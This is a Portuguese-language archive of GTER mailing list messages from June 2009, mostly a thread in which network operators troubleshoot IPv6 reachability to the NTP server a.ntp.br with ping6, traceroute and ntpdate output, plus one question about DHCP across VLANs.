yo-in-x68.google.com: icmp_seq=1 ttl=57 time=137 ms > > via ipv4, tranquilo ! > # ntpdate a.ntp.br > 19 Jun 01:07:04 ntpdate[21346]: adjust time server 200.160.0.8 offset > 0.003274 sec > > obrigado !!! > > -- > Sds. > > Alexandre Jeronimo Correa > > Onda Internet > www.onda.net.br > > IPV6 Ready ! > www.ipv6.onda.net.br > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- Wilson Lopes Registro .BR (11) 5509 - 3526 INOC 22548*WRL From wilson at registro.br Fri Jun 19 11:23:08 2009 From: wilson at registro.br (Wilson Rogerio Lopes) Date: Fri, 19 Jun 2009 11:23:08 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <20090619141044.GA94988@registro.br> References: <4A3B0F19.5000009@onda.psi.br> <20090619141044.GA94988@registro.br> Message-ID: <20090619142308.GA96701@registro.br> On Fri, Jun 19, 2009 at 11:10:44AM -0300, Wilson Rogerio Lopes wrote: > Alexandre, > > voc? executou o ntpdate como root ? Se n?o, use a op??o "-q" para apenas consultar, > e n?o sincronizar a m?quina local. > Acabo de verificar e o sevidor a.ntp.br responde sem problema. > > > $ ntpdate -q -6 a.ntp.br > server 2001:12ff::8, stratum 2, offset -0.000768, delay 0.02596 > 19 Jun 11:06:16 ntpdate[94975]: adjust time server 2001:12ff::8 offset -0.000768 sec > > > On Fri, Jun 19, 2009 at 01:07:53AM -0300, Alexandre J. Correa - Onda Internet wrote: > > Alguem da nic.br poderia verificar isto: > > > > # host a.ntp.br > > a.ntp.br has address 200.160.0.8 > > a.ntp.br has IPv6 address 2001:12ff::8 > > > > # ntpdate -6 a.ntp.br > > 19 Jun 01:05:23 ntpdate[21130]: no server suitable for synchronization found > > > > # ntpdate 2001:12ff::8 > > 19 Jun 01:05:23 ntpdate[21130]: no server suitable for synchronization found > > > > # ping6 ipv6.google.com > > PING ipv6.google.com(yo-in-x68.google.com) 56 data bytes > > 64 bytes from yo-in-x68.google.com: icmp_seq=0 ttl=57 time=136 ms > > 64 bytes from yo-in-x68.google.com: icmp_seq=1 ttl=57 time=137 ms Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade v6 ao servidor a.ntp.br $ ping6 a.ntp.br PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > > > > via ipv4, tranquilo ! > > # ntpdate a.ntp.br > > 19 Jun 01:07:04 ntpdate[21346]: adjust time server 200.160.0.8 offset > > 0.003274 sec > > > > obrigado !!! > > > > -- > > Sds. > > > > Alexandre Jeronimo Correa > > > > Onda Internet > > www.onda.net.br > > > > IPV6 Ready ! > > www.ipv6.onda.net.br > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > Wilson Lopes > Registro .BR > (11) 5509 - 3526 > INOC 22548*WRL > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- Wilson Lopes Registro .BR (11) 5509 - 3526 INOC 22548*WRL From eduardo at intron.com.br Fri Jun 19 11:29:00 2009 From: eduardo at intron.com.br (=?ISO-8859-1?Q?Eduardo_Ascen=E7o_Reis?=) Date: Fri, 19 Jun 2009 11:29:00 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <20090619142308.GA96701@registro.br> References: <4A3B0F19.5000009@onda.psi.br> <20090619141044.GA94988@registro.br> <20090619142308.GA96701@registro.br> Message-ID: <45e3c45f0906190729o1e458177o3368b2b5bd444026@mail.gmail.com> Caro Alexandre, Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? nos ajudar nesse caso. 2009/6/19 Wilson Rogerio Lopes > > Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade v6 > ao > servidor a.ntp.br > > $ ping6 a.ntp.br > PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que est? fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir dele para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. Abra?os, -- Eduardo Ascen?o Reis From epafras at ctbc.com.br Fri Jun 19 11:35:52 2009 From: epafras at ctbc.com.br (epafras at ctbc.com.br) Date: Fri, 19 Jun 2009 11:35:52 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <45e3c45f0906190729o1e458177o3368b2b5bd444026@mail.gmail.com> Message-ID: Fala Edu, Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar de receber a rota... o traceroute para no PTT... veja... Meu IP de origem ? o da interface .... 2001:12f8::24/64 {master} epafras at M10-SEMENTE-RE0> traceroute a.ntp.br traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, 12 byte packets 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms 2 * * * 3 * * ^C {master} epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 hidden) + = Active Route, - = Last Active, * = Both 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from 2001:12f8::253 AS path: 22548 I > to 2001:12f8::1 via ge-0/2/0.20 [BGP/170] 1w3d 14:50:11, localpref 160, from 2001:12f8::254 AS path: 22548 I > to 2001:12f8::1 via ge-0/2/0.20 [BGP/170] 2d 10:08:00, MED 0, localpref 100 AS path: 3549 22548 I > to 2001:450:2002:cc::1 via ge-0/3/0.907 [BGP/170] 6w2d 20:04:43, localpref 100 AS path: 12956 27664 22548 I > to 2001:1498:1:a100:c1:6735:100:1 via ge-0/2/0.4003 {master} epafras at M10-SEMENTE-RE0> ping a.ntp.br PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 ^C --- a.ntp.br ping6 statistics --- 10 packets transmitted, 0 packets received, 100% packet loss {master} epafras at M10-SEMENTE-RE0> Grande Abra?o, Epafras CTBC Re: [GTER] a.ntp.br via ipv6 nao funciona Eduardo Ascen?o Reis para: Grupo de Trabalho de Engenharia e Operacao de Redes 19/06/2009 11:25 Enviado por: gter-bounces at eng.registro.br Responda a Grupo de Trabalho de Engenharia e Operacao de Redes Caro Alexandre, Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? nos ajudar nesse caso. 2009/6/19 Wilson Rogerio Lopes > > Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade v6 > ao > servidor a.ntp.br > > $ ping6 a.ntp.br > PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que est? fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir dele para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. Abra?os, -- Eduardo Ascen?o Reis -- gter list https://eng.registro.br/mailman/listinfo/gter From francisco.henrique at gmail.com Fri Jun 19 11:08:47 2009 From: francisco.henrique at gmail.com (Francisco Henrique) Date: Fri, 19 Jun 2009 11:08:47 -0300 Subject: [GTER] =?iso-8859-1?q?Problema_com_DHCP_atrav=E9s_de_VLANs?= Message-ID: <138bd4780906190708x4c1eeac2o13a54ffb002ac1be@mail.gmail.com> Senhores, estou com um problema onde eu trabalho, ? o seguinte: Tenho um servidor rodando o Astaro, onde em uma interface fisica TRUNK ligada a um switch Dell eu tenho duas interfaces VLANs, uma com ID 101 e outra com ID 201. Nesse mesmo switch chega uma fibra optica de um dos predios da institui??o, onde existem duas subredes: 192.168.1.0/24 e 192.168.2.0/24. Essa fibra optica ? conectada em outra interface TRUNK onde as VLANs 1, 101 e 201 s?o aceitas. Minha inten??o era que os PCs da rede 192.168.1.0 ficassem na VLAN 101 e os da 192.168.2.0 ficarem na 201. Mas no switch de acesso n?o existe e nem pode ter configura??o de VLAN, s? a porta TRUNK de uplink. No Astaro tem um cadastro de mapeamento de MACs, onde pra cada MAC existe um determinado IP. Existe um servidor DHCP para cada rede. Eis a pergunta: Existe algum jeito desse servi?o de DHCP dar certo? Quando um PC faz um request de DHCP, o pacote vai com a marca??o 1, que ? da VLAN default de todos os switches, na hora que isso bate no Astaro, h? alguma chance dele entregar o IP certo para o PC que fez o request? Est? confuso este cen?rio? Alguem pode me clarear a mente? ab?s -- ============= Francisco Henrique C. Ferreira francisco.henrique at gmail.com UIN: 5328093 Linux Registered User #368514 From fneves at registro.br Fri Jun 19 12:14:31 2009 From: fneves at registro.br (Frederico A C Neves) Date: Fri, 19 Jun 2009 12:14:31 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: References: <45e3c45f0906190729o1e458177o3368b2b5bd444026@mail.gmail.com> Message-ID: <20090619151431.GA81287@registro.br> Epafras, Tem acesso v6 para a.dns.br ? % dig -6 @a.dns.br br soa ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa ... ;; Query time: 17 msec ;; SERVER: 2001:12ff::10#53(2001:12ff::10) ;; WHEN: Fri Jun 19 12:13:28 2009 ;; MSG SIZE rcvd: 330 Fred On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > Fala Edu, > > Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar de > receber a rota... o traceroute para no PTT... veja... > > > Meu IP de origem ? o da interface .... 2001:12f8::24/64 > > > {master} > epafras at M10-SEMENTE-RE0> traceroute a.ntp.br > traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, 12 > byte packets > 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms > 2 * * * > 3 * * ^C > {master} > epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 > > inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 > hidden) > + = Active Route, - = Last Active, * = Both > > 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from 2001:12f8::253 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 1w3d 14:50:11, localpref 160, from > 2001:12f8::254 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 2d 10:08:00, MED 0, localpref 100 > AS path: 3549 22548 I > > to 2001:450:2002:cc::1 via ge-0/3/0.907 > [BGP/170] 6w2d 20:04:43, localpref 100 > AS path: 12956 27664 22548 I > > to 2001:1498:1:a100:c1:6735:100:1 via ge-0/2/0.4003 > > {master} > epafras at M10-SEMENTE-RE0> ping a.ntp.br > PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 > ^C > --- a.ntp.br ping6 statistics --- > 10 packets transmitted, 0 packets received, 100% packet loss > > {master} > epafras at M10-SEMENTE-RE0> > > Grande Abra?o, > > Epafras > CTBC > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Eduardo Ascen?o Reis > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 11:25 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Caro Alexandre, > > Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? > nos > ajudar nesse caso. > > 2009/6/19 Wilson Rogerio Lopes > > > > > Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade > v6 > > ao > > servidor a.ntp.br > > > > $ ping6 a.ntp.br > > PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > > 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > > 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > > 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > > > > Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que > est? > fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir dele > para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. > > Abra?os, > > -- > > Eduardo Ascen?o Reis > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From epafras at ctbc.com.br Fri Jun 19 13:18:26 2009 From: epafras at ctbc.com.br (epafras at ctbc.com.br) Date: Fri, 19 Jun 2009 13:18:26 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <20090619151431.GA81287@registro.br> Message-ID: Fred, a.dns.br OK. epafras at M10-SEMENTE-RE0> ping a.dns.br PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms ^C --- a.dns.br ping6 statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms {master} epafras at M10-SEMENTE-RE0> {master} epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 Trying 2001:12ff::10... Connected to a.dns.br. Escape character is '^]'. ^C^] telnet> quit Connection closed. {master} epafras at M10-SEMENTE-RE0> Abs. Epafras Re: [GTER] a.ntp.br via ipv6 nao funciona Frederico A C Neves para: Grupo de Trabalho de Engenharia e Operacao de Redes 19/06/2009 12:10 Enviado por: gter-bounces at eng.registro.br Responda a Grupo de Trabalho de Engenharia e Operacao de Redes Epafras, Tem acesso v6 para a.dns.br ? % dig -6 @a.dns.br br soa ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa ... ;; Query time: 17 msec ;; SERVER: 2001:12ff::10#53(2001:12ff::10) ;; WHEN: Fri Jun 19 12:13:28 2009 ;; MSG SIZE rcvd: 330 Fred On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > Fala Edu, > > Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar de > receber a rota... o traceroute para no PTT... veja... > > > Meu IP de origem ? o da interface .... 2001:12f8::24/64 > > > {master} > epafras at M10-SEMENTE-RE0> traceroute a.ntp.br > traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, 12 > byte packets > 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms > 2 * * * > 3 * * ^C > {master} > epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 > > inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 > hidden) > + = Active Route, - = Last Active, * = Both > > 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from 2001:12f8::253 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 1w3d 14:50:11, localpref 160, from > 2001:12f8::254 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 2d 10:08:00, MED 0, localpref 100 > AS path: 3549 22548 I > > to 2001:450:2002:cc::1 via ge-0/3/0.907 > [BGP/170] 6w2d 20:04:43, localpref 100 > AS path: 12956 27664 22548 I > > to 2001:1498:1:a100:c1:6735:100:1 via ge-0/2/0.4003 > > {master} > epafras at M10-SEMENTE-RE0> ping a.ntp.br > PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 > ^C > --- a.ntp.br ping6 statistics --- > 10 packets transmitted, 0 packets received, 100% packet loss > > {master} > epafras at M10-SEMENTE-RE0> > > Grande Abra?o, > > Epafras > CTBC > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Eduardo Ascen?o Reis > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 11:25 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Caro Alexandre, > > Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? > nos > ajudar nesse caso. > > 2009/6/19 Wilson Rogerio Lopes > > > > > Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade > v6 > > ao > > servidor a.ntp.br > > > > $ ping6 a.ntp.br > > PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > > 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > > 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > > 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > > > > Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que > est? > fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir dele > para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. > > Abra?os, > > -- > > Eduardo Ascen?o Reis > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter From alexandre at onda.psi.br Fri Jun 19 13:40:45 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Fri, 19 Jun 2009 13:40:45 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: References: Message-ID: <4A3BBF8D.3010106@onda.psi.br> root at cube [/home/alexandre]# ping6 a.ntp.br PING a.ntp.br(a.ntp.br) 56 data bytes 64 bytes from a.ntp.br: icmp_seq=0 ttl=58 time=27.8 ms 64 bytes from a.ntp.br: icmp_seq=1 ttl=58 time=27.7 ms 64 bytes from a.ntp.br: icmp_seq=2 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=3 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=4 ttl=58 time=29.0 ms root at cube [/home/alexandre]# /usr/sbin/ntpdate -q -6 a.ntp.br server 2001:12ff::8, stratum 2, offset 0.071400, delay 0.04716 19 Jun 13:33:28 ntpdate[29780]: adjust time server 2001:12ff::8 offset 0.071400 sec root at cube [/home/alexandre]# /usr/sbin/ntpdate -6 a.ntp.br 19 Jun 13:33:38 ntpdate[29783]: no server suitable for synchronization found SQN-BRD-CTBC01#sh ipv6 route 2001:12ff:: IPv6 Routing Table - 1759 entries Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP U - Per-user Static route I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea, IS - ISIS summary O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2 ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2 B 2001:12FF::/32 [20/0] via 2001:1291:1601::A root at cube [/home/alexandre]# traceroute 2001:12ff::8 traceroute to 2001:12ff::8 (2001:12ff::8), 30 hops max, 40 byte packets 1 2001:12ac::1 (2001:12ac::1) 2.086 ms 2.904 ms 4.739 ms 2 2001:1291:1601::a (2001:1291:1601::a) 9.267 ms 9.252 ms 9.259 ms 3 2001:450:2002:cc::1 (2001:450:2002:cc::1) 19.506 ms 19.627 ms 19.681 ms 4 2001:450:2002:7f::2 (2001:450:2002:7f::2) 19.917 ms 19.651 ms 19.704 ms 5 ar01.bb1.registro.br (2001:12ff:2::228) 21.422 ms 21.550 ms 21.601 ms 6 2001:12ff:2:2::147 (2001:12ff:2:2::147) 19.691 ms 19.218 ms 19.081 ms 7 a.ntp.br (2001:12ff::8) 18.955 ms 19.144 ms 19.235 ms epafras at ctbc.com.br wrote: > Fred, > > a.dns.br OK. > > epafras at M10-SEMENTE-RE0> ping a.dns.br > PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 > 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms > 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms > 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms > 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms > ^C > --- a.dns.br ping6 statistics --- > 4 packets transmitted, 4 packets received, 0% packet loss > round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms > > {master} > epafras at M10-SEMENTE-RE0> > > {master} > epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 > Trying 2001:12ff::10... > Connected to a.dns.br. > Escape character is '^]'. > ^C^] > telnet> quit > Connection closed. > > {master} > epafras at M10-SEMENTE-RE0> > > Abs. > > Epafras > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Frederico A C Neves > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 12:10 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Epafras, > > Tem acesso v6 para a.dns.br ? > > % dig -6 @a.dns.br br soa > ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa > ... > ;; Query time: 17 msec > ;; SERVER: 2001:12ff::10#53(2001:12ff::10) > ;; WHEN: Fri Jun 19 12:13:28 2009 > ;; MSG SIZE rcvd: 330 > > Fred > > On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > >> Fala Edu, >> >> Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar >> > de > >> receber a rota... o traceroute para no PTT... veja... >> >> >> Meu IP de origem ? o da interface .... 2001:12f8::24/64 >> >> >> {master} >> epafras at M10-SEMENTE-RE0> traceroute a.ntp.br >> traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, >> > 12 > >> byte packets >> 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms >> 2 * * * >> 3 * * ^C >> {master} >> epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 >> >> inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 >> hidden) >> + = Active Route, - = Last Active, * = Both >> >> 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from >> > 2001:12f8::253 > >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 1w3d 14:50:11, localpref 160, from >> 2001:12f8::254 >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 2d 10:08:00, MED 0, localpref 100 >> AS path: 3549 22548 I >> > to 2001:450:2002:cc::1 via ge-0/3/0.907 >> [BGP/170] 6w2d 20:04:43, localpref 100 >> AS path: 12956 27664 22548 I >> > to 2001:1498:1:a100:c1:6735:100:1 via >> > ge-0/2/0.4003 > >> {master} >> epafras at M10-SEMENTE-RE0> ping a.ntp.br >> PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 >> ^C >> --- a.ntp.br ping6 statistics --- >> 10 packets transmitted, 0 packets received, 100% packet loss >> >> {master} >> epafras at M10-SEMENTE-RE0> >> >> Grande Abra?o, >> >> Epafras >> CTBC >> >> >> >> >> >> >> Re: [GTER] a.ntp.br via ipv6 nao funciona >> >> Eduardo Ascen?o Reis >> para: >> Grupo de Trabalho de Engenharia e Operacao de Redes >> 19/06/2009 11:25 >> >> >> Enviado por: >> gter-bounces at eng.registro.br >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >> >> >> >> >> >> >> Caro Alexandre, >> >> Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? >> nos >> ajudar nesse caso. >> >> 2009/6/19 Wilson Rogerio Lopes >> >> >>> Bem, antes de tudo, n?o custa ter certeza de que voc? tem >>> > conectividade > >> v6 >> >>> ao >>> servidor a.ntp.br >>> >>> $ ping6 a.ntp.br >>> PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 >>> 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms >>> >>> >> Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que >> est? >> fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir >> > dele > >> para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. >> >> Abra?os, >> >> -- >> >> Eduardo Ascen?o Reis >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From epafras at ctbc.com.br Fri Jun 19 13:48:47 2009 From: epafras at ctbc.com.br (epafras at ctbc.com.br) Date: Fri, 19 Jun 2009 13:48:47 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: <4A3BBF8D.3010106@onda.psi.br> Message-ID: Hummm.... agora funcionouuuu.... :-) {master} epafras at M10-SEMENTE-RE0> traceroute 2001:12ff::8 traceroute6 to 2001:12ff::8 (2001:12ff::8) from 2001:450:2002:cc::2, 64 hops max, 12 byte packets 1 2001:450:2002:cc::1 (2001:450:2002:cc::1) 17.332 ms 16.904 ms 16.660 ms 2 2001:450:2002:7f::2 (2001:450:2002:7f::2) 17.372 ms 17.130 ms 17.382 ms 3 ar01.bb1.registro.br (2001:12ff:2::228) 18.821 ms 17.918 ms 17.452 ms 4 2001:12ff:2:2::147 (2001:12ff:2:2::147) 17.329 ms 17.146 ms 17.175 ms 5 a.ntp.br (2001:12ff::8) 17.303 ms 17.182 ms 21.515 ms {master} epafras at M10-SEMENTE-RE0> Re: [GTER] a.ntp.br via ipv6 nao funciona Alexandre J. Correa - Onda Internet para: Grupo de Trabalho de Engenharia e Operacao de Redes 19/06/2009 13:37 Enviado por: gter-bounces at eng.registro.br Responda a Grupo de Trabalho de Engenharia e Operacao de Redes root at cube [/home/alexandre]# ping6 a.ntp.br PING a.ntp.br(a.ntp.br) 56 data bytes 64 bytes from a.ntp.br: icmp_seq=0 ttl=58 time=27.8 ms 64 bytes from a.ntp.br: icmp_seq=1 ttl=58 time=27.7 ms 64 bytes from a.ntp.br: icmp_seq=2 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=3 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=4 ttl=58 time=29.0 ms root at cube [/home/alexandre]# /usr/sbin/ntpdate -q -6 a.ntp.br server 2001:12ff::8, stratum 2, offset 0.071400, delay 0.04716 19 Jun 13:33:28 ntpdate[29780]: adjust time server 2001:12ff::8 offset 0.071400 sec root at cube [/home/alexandre]# /usr/sbin/ntpdate -6 a.ntp.br 19 Jun 13:33:38 ntpdate[29783]: no server suitable for synchronization found SQN-BRD-CTBC01#sh ipv6 route 2001:12ff:: IPv6 Routing Table - 1759 entries Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP U - Per-user Static route I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea, IS - ISIS summary O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2 ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2 B 2001:12FF::/32 [20/0] via 2001:1291:1601::A root at cube [/home/alexandre]# traceroute 2001:12ff::8 traceroute to 2001:12ff::8 (2001:12ff::8), 30 hops max, 40 byte packets 1 2001:12ac::1 (2001:12ac::1) 2.086 ms 2.904 ms 4.739 ms 2 2001:1291:1601::a (2001:1291:1601::a) 9.267 ms 9.252 ms 9.259 ms 3 2001:450:2002:cc::1 (2001:450:2002:cc::1) 19.506 ms 19.627 ms 19.681 ms 4 2001:450:2002:7f::2 (2001:450:2002:7f::2) 19.917 ms 19.651 ms 19.704 ms 5 ar01.bb1.registro.br (2001:12ff:2::228) 21.422 ms 21.550 ms 21.601 ms 6 2001:12ff:2:2::147 (2001:12ff:2:2::147) 19.691 ms 19.218 ms 19.081 ms 7 a.ntp.br (2001:12ff::8) 18.955 ms 19.144 ms 19.235 ms epafras at ctbc.com.br wrote: > Fred, > > a.dns.br OK. > > epafras at M10-SEMENTE-RE0> ping a.dns.br > PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 > 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms > 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms > 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms > 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms > ^C > --- a.dns.br ping6 statistics --- > 4 packets transmitted, 4 packets received, 0% packet loss > round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms > > {master} > epafras at M10-SEMENTE-RE0> > > {master} > epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 > Trying 2001:12ff::10... > Connected to a.dns.br. > Escape character is '^]'. > ^C^] > telnet> quit > Connection closed. > > {master} > epafras at M10-SEMENTE-RE0> > > Abs. > > Epafras > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Frederico A C Neves > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 